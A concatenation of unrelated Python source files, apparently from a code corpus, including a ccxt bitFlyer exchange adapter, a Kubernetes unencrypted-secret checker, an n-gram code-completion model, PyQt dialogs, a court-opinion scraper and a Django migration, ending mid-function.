# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async.base.exchange import Exchange
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import OrderNotFound
class bitflyer (Exchange):
def describe(self):
return self.deep_extend(super(bitflyer, self).describe(), {
'id': 'bitflyer',
'name': 'bitFlyer',
'countries': 'JP',
'version': 'v1',
'rateLimit': 1000, # their nonce-timestamp is in seconds...
'has': {
'CORS': False,
'withdraw': True,
'fetchMyTrades': True,
'fetchOrders': True,
'fetchOrder': True,
'fetchOpenOrders': 'emulated',
'fetchClosedOrders': 'emulated',
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/28051642-56154182-660e-11e7-9b0d-6042d1e6edd8.jpg',
'api': 'https://api.bitflyer.jp',
'www': 'https://bitflyer.jp',
'doc': 'https://bitflyer.jp/API',
},
'api': {
'public': {
'get': [
'getmarkets/usa', # new(wip)
'getmarkets/eu', # new(wip)
'getmarkets', # or 'markets'
'getboard', # ...
'getticker',
'getexecutions',
'gethealth',
'getboardstate',
'getchats',
],
},
'private': {
'get': [
'getpermissions',
'getbalance',
'getcollateral',
'getcollateralaccounts',
'getaddresses',
'getcoinins',
'getcoinouts',
'getbankaccounts',
'getdeposits',
'getwithdrawals',
'getchildorders',
'getparentorders',
'getparentorder',
'getexecutions',
'getpositions',
'gettradingcommission',
],
'post': [
'sendcoin',
'withdraw',
'sendchildorder',
'cancelchildorder',
'sendparentorder',
'cancelparentorder',
'cancelallchildorders',
],
},
},
'fees': {
'trading': {
'maker': 0.25 / 100,
'taker': 0.25 / 100,
},
},
})
async def fetch_markets(self):
jp_markets = await self.publicGetGetmarkets()
us_markets = await self.publicGetGetmarketsUsa()
eu_markets = await self.publicGetGetmarketsEu()
markets = self.array_concat(jp_markets, us_markets)
markets = self.array_concat(markets, eu_markets)
result = []
for p in range(0, len(markets)):
market = markets[p]
id = market['product_code']
currencies = id.split('_')
base = None
quote = None
symbol = id
numCurrencies = len(currencies)
if numCurrencies == 1:
base = symbol[0:3]
quote = symbol[3:6]
elif numCurrencies == 2:
base = currencies[0]
quote = currencies[1]
symbol = base + '/' + quote
else:
base = currencies[1]
quote = currencies[2]
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'info': market,
})
return result
async def fetch_balance(self, params={}):
await self.load_markets()
response = await self.privateGetGetbalance()
balances = {}
for b in range(0, len(response)):
account = response[b]
currency = account['currency_code']
balances[currency] = account
result = {'info': response}
currencies = list(self.currencies.keys())
for i in range(0, len(currencies)):
currency = currencies[i]
account = self.account()
if currency in balances:
account['total'] = balances[currency]['amount']
account['free'] = balances[currency]['available']
account['used'] = account['total'] - account['free']
result[currency] = account
return self.parse_balance(result)
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
orderbook = await self.publicGetGetboard(self.extend({
'product_code': self.market_id(symbol),
}, params))
return self.parse_order_book(orderbook, None, 'bids', 'asks', 'price', 'size')
async def fetch_ticker(self, symbol, params={}):
await self.load_markets()
ticker = await self.publicGetGetticker(self.extend({
'product_code': self.market_id(symbol),
}, params))
timestamp = self.parse8601(ticker['timestamp'])
last = float(ticker['ltp'])
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': float(ticker['best_bid']),
'bidVolume': None,
'ask': float(ticker['best_ask']),
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': float(ticker['volume_by_product']),
'quoteVolume': None,
'info': ticker,
}
def parse_trade(self, trade, market=None):
side = None
order = None
if 'side' in trade:
if trade['side']:
side = trade['side'].lower()
id = side + '_child_order_acceptance_id'
if id in trade:
order = trade[id]
if order is None:
order = self.safe_string(trade, 'child_order_acceptance_id')
timestamp = self.parse8601(trade['exec_date'])
return {
'id': str(trade['id']),
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': market['symbol'],
'order': order,
'type': None,
'side': side,
'price': trade['price'],
'amount': trade['size'],
}
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
response = await self.publicGetGetexecutions(self.extend({
'product_code': market['id'],
}, params))
return self.parse_trades(response, market, since, limit)
async def create_order(self, symbol, type, side, amount, price=None, params={}):
await self.load_markets()
order = {
'product_code': self.market_id(symbol),
'child_order_type': type.upper(),
'side': side.upper(),
'price': price,
'size': amount,
}
result = await self.privatePostSendchildorder(self.extend(order, params))
# {"status": - 200, "error_message": "Insufficient funds", "data": null}
return {
'info': result,
'id': result['child_order_acceptance_id'],
}
async def cancel_order(self, id, symbol=None, params={}):
if symbol is None:
raise ExchangeError(self.id + ' cancelOrder() requires a symbol argument')
await self.load_markets()
return await self.privatePostCancelchildorder(self.extend({
'product_code': self.market_id(symbol),
'child_order_acceptance_id': id,
}, params))
def parse_order_status(self, status):
statuses = {
'ACTIVE': 'open',
'COMPLETED': 'closed',
'CANCELED': 'canceled',
'EXPIRED': 'canceled',
'REJECTED': 'canceled',
}
if status in statuses:
return statuses[status]
return status.lower()
def parse_order(self, order, market=None):
timestamp = self.parse8601(order['child_order_date'])
amount = self.safe_float(order, 'size')
remaining = self.safe_float(order, 'outstanding_size')
filled = self.safe_float(order, 'executed_size')
price = self.safe_float(order, 'price')
cost = price * filled
status = self.parse_order_status(order['child_order_state'])
type = order['child_order_type'].lower()
side = order['side'].lower()
symbol = None
if market is None:
marketId = self.safe_string(order, 'product_code')
if marketId is not None:
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
if market is not None:
symbol = market['symbol']
fee = None
feeCost = self.safe_float(order, 'total_commission')
if feeCost is not None:
fee = {
'cost': feeCost,
'currency': None,
'rate': None,
}
return {
'id': order['child_order_acceptance_id'],
'info': order,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': type,
'side': side,
'price': price,
'cost': cost,
'amount': amount,
'filled': filled,
'remaining': remaining,
'fee': fee,
}
async def fetch_orders(self, symbol=None, since=None, limit=100, params={}):
if symbol is None:
raise ExchangeError(self.id + ' fetchOrders() requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
request = {
'product_code': market['id'],
'count': limit,
}
response = await self.privateGetGetchildorders(self.extend(request, params))
orders = self.parse_orders(response, market, since, limit)
if symbol:
orders = self.filter_by(orders, 'symbol', symbol)
return orders
async def fetch_open_orders(self, symbol=None, since=None, limit=100, params={}):
params['child_order_state'] = 'ACTIVE'
return self.fetch_orders(symbol, since, limit, params)
async def fetch_closed_orders(self, symbol=None, since=None, limit=100, params={}):
params['child_order_state'] = 'COMPLETED'
return self.fetch_orders(symbol, since, limit, params)
async def fetch_order(self, id, symbol=None, params={}):
if symbol is None:
raise ExchangeError(self.id + ' fetchOrder() requires a symbol argument')
orders = await self.fetch_orders(symbol)
ordersById = self.index_by(orders, 'id')
if id in ordersById:
return ordersById[id]
raise OrderNotFound(self.id + ' No order found with id ' + id)
async def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ExchangeError(self.id + ' fetchMyTrades requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
request = {
'product_code': market['id'],
}
if limit:
request['count'] = limit
response = await self.privateGetGetexecutions(self.extend(request, params))
return self.parse_trades(response, market, since, limit)
async def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
await self.load_markets()
if code != 'JPY' and code != 'USD' and code != 'EUR':
raise ExchangeError(self.id + ' allows withdrawing JPY, USD, EUR only, ' + code + ' is not supported')
currency = self.currency(code)
response = await self.privatePostWithdraw(self.extend({
'currency_code': currency['id'],
'amount': amount,
# 'bank_account_id': 1234,
}, params))
return {
'info': response,
'id': response['message_id'],
}
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
request = '/' + self.version + '/'
if api == 'private':
request += 'me/'
request += path
if method == 'GET':
if params:
request += '?' + self.urlencode(params)
url = self.urls['api'] + request
if api == 'private':
self.check_required_credentials()
nonce = str(self.nonce())
auth = ''.join([nonce, method, request])
if params:
if method != 'GET':
body = self.json(params)
auth += body
headers = {
'ACCESS-KEY': self.apiKey,
'ACCESS-TIMESTAMP': nonce,
'ACCESS-SIGN': self.hmac(self.encode(auth), self.encode(self.secret)),
'Content-Type': 'application/json',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
|
py | b4112aa75b3244722fb77d7a89ee0263ccfb2ac2 | from __future__ import print_function
import argparse
import re
import sys
SECRET_REGEX = r"^kind:\ssecret"
SOPS_REGEX = r"ENC.AES256"
KUSTOMIZE_REGEX = r"^\$patch:\sdelete"
def contains_secret(filename):
with open(filename, mode="r") as file_checked:
lines = file_checked.read()
kubernetes_secret = re.findall(
SECRET_REGEX, lines, flags=re.IGNORECASE | re.MULTILINE
)
if kubernetes_secret:
ignore_secret = re.findall(
SOPS_REGEX, lines, flags=re.IGNORECASE | re.MULTILINE
) or re.findall(KUSTOMIZE_REGEX, lines, flags=re.IGNORECASE | re.MULTILINE)
if not ignore_secret:
return True
return False
def main(argv=None):
parser = argparse.ArgumentParser()
parser.add_argument("filenames", nargs="*", help="filenames to check")
args = parser.parse_args(argv)
files_with_secrets = [f for f in args.filenames if contains_secret(f)]
return_code = 0
for file_with_secrets in files_with_secrets:
print(
"Unencrypted Kubernetes secret detected in file: {0}".format(
file_with_secrets
)
)
return_code = 1
return return_code
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
|
py | b4112ad0907859d906954865d64d0e825f570873 | #
# Test base current collector submodel
#
import pybamm
import tests
import unittest
class TestBaseModel(unittest.TestCase):
def test_public_functions(self):
param = pybamm.standard_parameters_lithium_ion
submodel = pybamm.current_collector.PotentialPair1plus1D(param)
variables = {
"Positive current collector potential": pybamm.PrimaryBroadcast(
0, "current collector"
)
}
std_tests = tests.StandardSubModelTests(submodel, variables)
std_tests.test_all()
submodel = pybamm.current_collector.PotentialPair2plus1D(param)
std_tests = tests.StandardSubModelTests(submodel, variables)
std_tests.test_all()
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
|
py | b4112adf18535e3c4fe9661587c65c8389cee4ed | """
Input Dialog for EELS Analysis
Author: Gerd Duscher
"""
import numpy as np
import sidpy
from PyQt5 import QtCore, QtWidgets
from pyTEMlib import info_dlg
import pyTEMlib.interactive_eels as ieels
from pyTEMlib.microscope import microscope
from pyTEMlib import file_tools as ft
_version = 000
class InfoDialog(QtWidgets.QDialog):
"""
Input Dialog for EELS Analysis
Opens a PyQt5 GUi Dialog that allows to set the experimental parameter necessary for a Quantification.
The dialog operates on a sidpy dataset
"""
def __init__(self, dataset=None):
super().__init__(None, QtCore.Qt.WindowStaysOnTopHint)
# Create an instance of the GUI
self.ui = info_dlg.UiDialog(self)
self.set_action()
self.dataset = dataset
self.spec_dim = []
self.energy_scale = np.array([])
self.experiment = {}
self.energy_dlg = None
self.axis = None
self.show()
if dataset is None:
# make a dummy dataset for testing
dataset = ft.make_dummy_dataset(sidpy.DataType.SPECTRUM)
if not isinstance(dataset, sidpy.Dataset):
raise TypeError('dataset has to be a sidpy dataset')
self.set_dataset(dataset)
self.dataset.plot()
if hasattr(self.dataset.view, 'axes'):
self.axis = self.dataset.view.axes[-1]
elif hasattr(self.dataset.view, 'axis'):
self.axis = self.dataset.view.axis
self.figure = self.axis.figure
self.plot()
self.update()
def set_dataset(self, dataset):
self.dataset = dataset
if not hasattr(self.dataset, '_axes'):
self.dataset._axes = self.dataset.axes
if not hasattr(self.dataset, 'meta_data'):
self.dataset.meta_data = {}
self.spec_dim = ft.get_dimensions_by_type(sidpy.DimensionType.SPECTRAL, dataset)
if len(self.spec_dim) != 1:
raise TypeError('We need exactly one SPECTRAL dimension')
self.spec_dim = self.spec_dim[0]
self.energy_scale = self.spec_dim[1].values.copy()
minimum_info = {'offset': self.energy_scale[0],
'dispersion': self.energy_scale[1] - self.energy_scale[0],
'exposure_time': 0.0,
'convergence_angle': 0.0, 'collection_angle': 0.0,
'acceleration_voltage': 100.0, 'binning': 1, 'conversion': 1.0,
'flux': 1.0, 'current': 1.0, 'SI_bin_x': 1, 'SI_bin_y': 1}
if 'experiment' not in self.dataset.metadata:
self.dataset.metadata['experiment'] = minimum_info
self.experiment = self.dataset.metadata['experiment']
for key, item in minimum_info.items():
if key not in self.experiment:
self.experiment[key] = item
def set_dimension(self):
self.spec_dim = ft.get_dimensions_by_type(sidpy.DimensionType.SPECTRAL, self.dataset)
self.spec_dim = self.spec_dim[0]
old_energy_scale = self.spec_dim[1]
self.dataset.set_dimension(self.spec_dim[0], sidpy.Dimension(np.array(self.energy_scale),
name=old_energy_scale.name,
dimension_type=sidpy.DimensionType.SPECTRAL,
units='eV',
quantity='energy loss'))
def update(self):
self.ui.offsetEdit.setText(f"{self.experiment['offset']:.3f}")
self.ui.dispersionEdit.setText(f"{self.experiment['dispersion']:.3f}")
self.ui.timeEdit.setText(f"{self.experiment['exposure_time']:.6f}")
self.ui.convEdit.setText(f"{self.experiment['convergence_angle']:.2f}")
self.ui.collEdit.setText(f"{self.experiment['collection_angle']:.2f}")
self.ui.E0Edit.setText(f"{self.experiment['acceleration_voltage']/1000.:.2f}")
self.ui.binningEdit.setText(f"{self.experiment['binning']}")
self.ui.conversionEdit.setText(f"{self.experiment['conversion']:.2f}")
self.ui.fluxEdit.setText(f"{self.experiment['flux']:.2f}")
self.ui.VOAEdit.setText(f"{self.experiment['current']:.2f}")
def on_enter(self):
sender = self.sender()
if sender == self.ui.offsetEdit:
value = float(str(sender.displayText()).strip())
self.experiment['offset'] = value
sender.setText(f"{value:.2f}")
self.energy_scale = self.energy_scale - self.energy_scale[0] + value
self.set_dimension()
self.plot()
elif sender == self.ui.dispersionEdit:
value = float(str(sender.displayText()).strip())
self.experiment['dispersion'] = value
self.energy_scale = np.arange(len(self.energy_scale)) * value + self.energy_scale[0]
self.set_dimension()
self.plot()
sender.setText(f"{value:.3f}")
elif sender == self.ui.timeEdit:
value = float(str(sender.displayText()).strip())
self.experiment['exposure_time'] = value
sender.setText(f"{value:.2f}")
elif sender == self.ui.convEdit:
value = float(str(sender.displayText()).strip())
self.experiment['convergence_angle'] = value
sender.setText(f"{value:.2f}")
elif sender == self.ui.collEdit:
value = float(str(sender.displayText()).strip())
self.experiment['collection_angle'] = value
sender.setText(f"{value:.2f}")
elif sender == self.ui.E0Edit:
value = float(str(sender.displayText()).strip())
self.experiment['acceleration_voltage'] = value*1000.0
sender.setText(f"{value:.2f}")
elif sender == self.ui.E0Edit:
value = float(str(sender.displayText()).strip())
self.experiment['acceleration_voltage'] = value
sender.setText(f"{value:.2f}")
elif sender == self.ui.binXEdit or sender == self.ui.binYEdit:
if self.dataset.data_type == sidpy.DataType.SPECTRAL_IMAGE:
bin_x = int(self.ui.binXEdit.displayText())
bin_y = int(self.ui.binYEdit.displayText())
self.experiment['SI_bin_x'] = bin_x
self.experiment['SI_bin_y'] = bin_y
self.dataset.view.set_bin([bin_x, bin_y])
self.ui.binXEdit.setText(str(self.dataset.view.bin_x))
self.ui.binYEdit.setText(str(self.dataset.view.bin_y))
else:
print('not supported yet')
def plot(self):
if self.dataset.data_type == sidpy.DataType.SPECTRAL_IMAGE:
spectrum = self.dataset.view.get_spectrum()
self.axis = self.dataset.view.axes[1]
else:
spectrum = np.array(self.dataset)
self.axis = self.dataset.view.axis
x_limit = self.axis.get_xlim()
y_limit = self.axis.get_ylim()
self.axis.clear()
self.axis.plot(self.energy_scale, spectrum, label='spectrum')
self.axis.set_xlim(x_limit)
self.axis.set_ylim(y_limit)
self.figure.canvas.draw_idle()
def on_list_enter(self):
sender = self.sender()
if sender == self.ui.TEMList:
microscope.set_microscope(self.ui.TEMList.currentText())
self.experiment['microscope'] = microscope.name
self.experiment['convergence_angle'] = microscope.alpha
self.experiment['collection_angle'] = microscope.beta
self.experiment['acceleration_voltage'] = microscope.E0
self.update()
def set_energy_scale(self):
self.energy_dlg = ieels.EnergySelector(self.dataset)
self.energy_dlg.signal_selected[bool].connect(self.set_energy)
self.energy_dlg.show()
def set_energy(self, k):
self.spec_dim = ft.get_dimensions_by_type(sidpy.DimensionType.SPECTRAL, self.dataset)
self.spec_dim = self.spec_dim[0]
self.energy_scale = self.spec_dim[1]
self.experiment['offset'] = self.energy_scale[0]
self.experiment['dispersion'] = self.energy_scale[1] - self.energy_scale[0]
self.update()
def on_check(self):
pass
def set_action(self):
self.ui.offsetEdit.editingFinished.connect(self.on_enter)
self.ui.dispersionEdit.editingFinished.connect(self.on_enter)
self.ui.timeEdit.editingFinished.connect(self.on_enter)
self.ui.TEMList.activated[str].connect(self.on_list_enter)
self.ui.convEdit.editingFinished.connect(self.on_enter)
self.ui.collEdit.editingFinished.connect(self.on_enter)
self.ui.E0Edit.editingFinished.connect(self.on_enter)
self.ui.binningEdit.editingFinished.connect(self.on_enter)
self.ui.conversionEdit.editingFinished.connect(self.on_enter)
self.ui.fluxEdit.editingFinished.connect(self.on_enter)
self.ui.VOAEdit.editingFinished.connect(self.on_enter)
self.ui.energy_button.clicked.connect(self.set_energy_scale)
self.ui.binXEdit.editingFinished.connect(self.on_enter)
self.ui.binYEdit.editingFinished.connect(self.on_enter)
|
py | b4112b1f0663fede4166fe0977b363f8c37472b9 | from collections import defaultdict
import nltk
from nltk.util import ngrams
from tqdm import tqdm
import numpy as np
import torch
from torchmetrics.functional.classification.f_beta import f1, fbeta
from torchmetrics.functional.classification.precision_recall import (precision,recall)
# for sorting the probable word acc. to their probabilities
# returns: void
# arg: dict
def sortProbWordDict(prob_dict):
for key in prob_dict:
if len(prob_dict[key]) > 1:
# only at most top 2 most probable words have been taken
prob_dict[key] = sorted(prob_dict[key], reverse=True)
# creates the dictionaries required for computing Interpolated Knesser Ney probability
# arg: dict, int
# returns: dict, dict
def createKNDict(ngram_dict, n):
# for knesser ney probability formula we need to find to important things
# first is for P(Wn|Wn-1) if find no. of ngrams which ends with Wn and no. of ngrams which starts
# with Wn-1
# so we divide the formula into two parts ,first part can be found in constant time
# and second term is found here
# for storing count of ngram ending with Wn,key:unigram
first_dict = {}
# for storing count of ngram having Wn-1 as its starting part, key: trigram sentence
sec_dict = {}
for key in ngram_dict:
# split the key sentence into tokens
ngram_token = key.split()
# since the indexing is from 0 ,so for quadgram we need to create a sentence of three words
# so start from 0 to 2,so we subtract 1,similarly for trigram from 0 to 1
n_1gram_sen = ' '.join(ngram_token[: n - 1])
# n_1gram_sen is the word that stars in sec_dict[n_1gram_sen] number of times in ngram_dict
if n_1gram_sen not in sec_dict:
sec_dict[n_1gram_sen] = 1
else:
sec_dict[n_1gram_sen] += 1
if ngram_token[-1] not in first_dict:
first_dict[ngram_token[-1]] = 1
else:
first_dict[ngram_token[-1]] += 1
return first_dict, sec_dict
# Finds the Knesser Ney probability for prediction
# arg: dict, dict
# return: void
def computeKnesserNeyProb(n_gram_dict, prob_dict):
d = 0.75
# first create the dict for storing the count of Wn-1 followed by Wn and for
# ngrams preceding Wn-1
n_gram_fs_dict = {}
# n-gram starts from 2 so match the last ngram size it should be len(dic) + 1
last_gram_dict = n_gram_dict[len(n_gram_dict) + 1]
# building first and second KNdict
for n_gram in n_gram_dict:
# print(n_gram)
first_dict = {}
sec_dict = {}
first_dict, sec_dict = createKNDict(n_gram_dict[n_gram], n_gram)
n_gram_fs_dict[n_gram] = {1: first_dict, 2: sec_dict}
# now find the probability for the sentences
for n_gram in last_gram_dict:
n_gram_token = n_gram.split()
n_gram_sen = ' '.join(n_gram_token[:-1])
n_gram_pred = n_gram_token[-1]
prob = 0.0
for fs_n_gram in n_gram_fs_dict:
first_dict = {}
sec_dict = {}
first_dict = n_gram_fs_dict[fs_n_gram][1]
sec_dict = n_gram_fs_dict[fs_n_gram][2]
ngram_dict = n_gram_dict[fs_n_gram]
# check if the current ngram is equal to max ngrams given
# then calculate max gram probs else normal
if len(n_gram_fs_dict) + 1 == fs_n_gram:
ngram_dict_before = n_gram_dict[fs_n_gram - 1]
prob1 = max(ngram_dict[n_gram] - d, 0) / ngram_dict_before[n_gram_sen]
prob2 = d / ngram_dict_before[n_gram_sen] * (sec_dict[n_gram_sen])
else:
prob1 = max(first_dict[n_gram_pred] - d, 0) / len(ngram_dict)
prob2 = (d / len(ngram_dict)) * (sec_dict[' '.join(n_gram_token[1:fs_n_gram])])
if fs_n_gram == 2:
uni_prob = first_dict[n_gram_pred] / len(ngram_dict)
prob = prob1 + prob2 * (uni_prob)
else:
prob = prob1 + prob2 * (prob)
if n_gram_sen not in prob_dict:
prob_dict[n_gram_sen] = []
prob_dict[n_gram_sen].append([prob, n_gram_pred])
else:
prob_dict[n_gram_sen].append([prob, n_gram_pred])
def doPrediction(sen, prob_dict):
if sen in prob_dict:
return prob_dict[sen]
else:
return None
def calculate_accuracy(X_test, y_test, model, k):
k = max(k, 1)
score = 0
total = len(X_test)
for prevWords, trueWord in zip(X_test, y_test):
logits = doPrediction(prevWords, model)
if logits:
for count, value in enumerate(logits):
if count >= k: break
# prob = value[0]
pred = value[1]
if pred == trueWord:
score += 1
break
return score / total
def train_ngram(train_dataset, n_gram=5, smoothing=True):
# variable declaration
prob_dict = defaultdict(list) # for storing probability of probable words for prediction
if smoothing:
n_gram_dict = {} # for keeping count of sentences (n-grams)
for i in range(2, n_gram + 1):
print(f"\t> Building {i}-grams")
# creating ngram dict
temp_dict = defaultdict(int)
for item in tqdm(train_dataset):
tokens_stream = item['text']
for t in list(ngrams(tokens_stream, i)):
sen = ' '.join(t)
temp_dict[sen] += 1
n_gram_dict[i] = temp_dict
# Smoothing: compute the Knesser Ney probabilities
computeKnesserNeyProb(n_gram_dict, prob_dict)
else:
max_gram_dict = {}
count_dict = defaultdict(int)
for item in tqdm(train_dataset):
tokens_stream = item['text']
for t in list(ngrams(tokens_stream, n_gram)):
sen = ' '.join(t)
count_dict[sen] += 1
prev_words, target_word = t[:-1], t[-1]
if prev_words in max_gram_dict:
max_gram_dict[prev_words].append(target_word)
else:
max_gram_dict[prev_words] = [target_word]
for token, count_of_token in count_dict.items():
token = token.split()
prev_words, target_word = token[:-1], token[-1]
try:
count_of_context = float(len(max_gram_dict[tuple(prev_words)]))
prob = count_of_token / count_of_context
except KeyError:
prob = 0.0
prev_words = " ".join(prev_words)
if prev_words in prob_dict:
prob_dict[prev_words].append([prob, target_word])
else:
prob_dict[prev_words] = [[prob, target_word]]
# sort the probable words by their probability
sortProbWordDict(prob_dict)
return prob_dict
def calculate_PRF(X_test, y_test, model, word_idx):
preds = []
labels = []
for prevWords, trueWord in zip(X_test, y_test):
logits = doPrediction(prevWords, model)
if logits:
preds.append(word_idx[logits[0][1]])
else:
preds.append(0) # it will appedn <pad> token as pred which is near to imposible in test set
labels.append(word_idx[trueWord])
preds = torch.as_tensor(preds)
labels = torch.as_tensor(labels)
scores = {}
scores['precision'] = precision(preds, labels, average='weighted', num_classes=502)
scores['recall'] = recall(preds, labels, average='weighted', num_classes=502)
scores['f1'] = f1(preds, labels, average='weighted', num_classes=502, beta=1)
scores['fbeta'] = fbeta(preds, labels, average='weighted', num_classes=502, beta=0.5)
return scores
def test_ngram(model, test_dataset, n_gram=5, word_idx=None):
X_test = []
y_test = []
for item in tqdm(test_dataset):
tokens_stream = item['text']
for i in range(n_gram, len(tokens_stream)):
seq = tokens_stream[i - n_gram: i]
X_test.append(" ".join(seq[0:-1]))
y_test.append(seq[-1])
scores = calculate_PRF(X_test, y_test, model, word_idx)
for i in [1, 2, 3, 4, 5, 10]:
scores[f'acc_{i}'] = calculate_accuracy(X_test, y_test, model, i)
return scores
def predict(seed, model, context_size):
logits = model[" ".join(seed[-(context_size - 1):])] # -(context_size-1) simple trick for sliding the context
if not logits:
return None, None
# prob = logits[0][0]
# pred = logits[0][1]
return logits[0][0], logits[0][1]
def greedy_decoder(seed, model, context_size, MaxPred):
answer = seed
# In n-gram model the pred word is included in context so we pad the seed with context - 2
PAD = ['<pad>'] * (context_size - 2)
seed = PAD + [seed]
while True:
prob_pred = doPrediction(" ".join(seed[-(context_size - 1):]), model)
if prob_pred is None:
return answer
prob, pred = prob_pred[0][0], prob_pred[0][1] # greedily taking top 1 predictions
answer += " " + pred
seed.append(pred)
if pred in [";", "{", "}"] or len(answer.split()) > MaxPred:
break
return answer
def beam_decoder(seed, model, context_size, MaxPred, k=5):
answer = seed
# In n-gram model the pred word is included in context so we pad the seed with context - 2
PAD = ['<pad>'] * (context_size - 2)
seed = PAD + [seed]
answers = []
prob_pred = doPrediction(" ".join(seed[-(context_size - 1):]), model)
if prob_pred is None:
return answer
# selecting top k predictions
for i in range(k):
try:
answers.append([(prob_pred[i][0], prob_pred[i][1])]) # prob, pred
except:
answers.append([(0.0, '<idf>')]) # prob, pred
count = 0
while True:
count += 1
for _ in range(k):
seq = answers.pop(0)
if seq[-1][1] in [";", "{", "}"]:
answers.append(seq)
continue
target_seed = seed + [s[1] for s in seq]
prob_pred = doPrediction(" ".join(target_seed[-(context_size - 1):]), model)
if prob_pred is None:
continue
# selecting top k predictions
for i in range(k):
try:
answers.append(seq + [(prob_pred[i][0], prob_pred[i][1])]) # prob, pred
except:
answers.append(seq + [(0.0, '<idf>')]) # prob, pred
dead_list = [sum([np.log(x[0]) for x in seq]) for seq in answers] # seq[:, 1]
try:
top_k_idx = np.argpartition(dead_list, -k)[-k:]
answers = [answers[i] for i in top_k_idx] # answers[top_k_idx]
except:
pass
if all([s[-1][1] in [";", "{", "}"] or len(s) > MaxPred for s in answers]):
break
dead_list = [sum([np.log(x[0]) for x in seq]) for seq in answers]
# TODO: Return k best
best_answer = answers[np.argmax(dead_list)]
for token in best_answer:
answer += " " + token[1]
return answer
def template_generator(model, test_dataset, context_size=5, method='greedy', topK=1):
X_true = []
X_pred = []
for item in tqdm(test_dataset):
tokens_stream = item['text']
test_item = " ".join(tokens_stream)
seed = test_item[0]
if method == "greedy":
ts = greedy_decoder(seed, model, context_size, context_size + 10)
pred_item = " ".join(seed+ts)
elif method == "beam":
ts = beam_decoder(seed, model, context_size, context_size + 10, k=topK)
pred_item = " ".join(seed+ts)
else:
raise "invalid method please choose 'greedy' or 'beam'"
X_true.append(test_item)
X_pred.append(pred_item)
return X_true, X_pred
|
py | b4112b3b96d2e976084e985c1bb773e6bd47bfb2 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mosaic.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_GroupBox(object):
def setupUi(self, GroupBox):
GroupBox.setObjectName("GroupBox")
GroupBox.resize(330, 183)
self.horizontalLayout = QtWidgets.QHBoxLayout(GroupBox)
self.horizontalLayout.setObjectName("horizontalLayout")
self.objectiveLabel = QtWidgets.QLabel(GroupBox)
self.objectiveLabel.setObjectName("objectiveLabel")
self.horizontalLayout.addWidget(self.objectiveLabel)
self.objectiveText = QtWidgets.QLabel(GroupBox)
self.objectiveText.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.objectiveText.setObjectName("objectiveText")
self.horizontalLayout.addWidget(self.objectiveText)
self.retranslateUi(GroupBox)
QtCore.QMetaObject.connectSlotsByName(GroupBox)
def retranslateUi(self, GroupBox):
_translate = QtCore.QCoreApplication.translate
GroupBox.setWindowTitle(_translate("GroupBox", "GroupBox"))
GroupBox.setTitle(_translate("GroupBox", "Mosaic"))
self.objectiveLabel.setText(_translate("GroupBox", "Objective:"))
self.objectiveText.setText(_translate("GroupBox", "asdf"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
GroupBox = QtWidgets.QGroupBox()
ui = Ui_GroupBox()
ui.setupUi(GroupBox)
GroupBox.show()
sys.exit(app.exec_())
|
py | b4112cddec670652db413dfe950eac02bcec0ad5 | # Scraper for California's Fourth District Court of Appeal Division 3
# CourtID: calctapp_4th_div3
# Court Short Name: Cal. Ct. App.
from juriscraper.opinions.united_states.state import calctapp_1st
class Site(calctapp_1st.Site):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.court_id = self.__module__
self.court_code = "G"
self.division = "4th App. Dist. Div. 3"
|
py | b4112d1e3bd66adcf89701f4e435a6babbb90ebd | # Generated by Django 2.1.5 on 2019-01-16 16:26
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('body', models.CharField(max_length=500)),
],
),
]
|
py | b4112dcb4127f9e5a1e5d3b31712df8f3ef89177 | import torch
import logging
logger = logging.getLogger('global')
def check_keys(model, pretrained_state_dict):
ckpt_keys = set(pretrained_state_dict.keys())
model_keys = set(model.state_dict().keys())
used_pretrained_keys = model_keys & ckpt_keys
unused_pretrained_keys = ckpt_keys - model_keys
missing_keys = model_keys - ckpt_keys
if len(missing_keys) > 0:
logger.info('[Warning] missing keys: {}'.format(missing_keys))
logger.info('missing keys:{}'.format(len(missing_keys)))
if len(unused_pretrained_keys) > 0:
logger.info('[Warning] unused_pretrained_keys: {}'.format(unused_pretrained_keys))
logger.info('unused checkpoint keys:{}'.format(len(unused_pretrained_keys)))
logger.info('used keys:{}'.format(len(used_pretrained_keys)))
assert len(used_pretrained_keys) > 0, 'load NONE from pretrained checkpoint'
return True
def remove_prefix(state_dict, prefix):
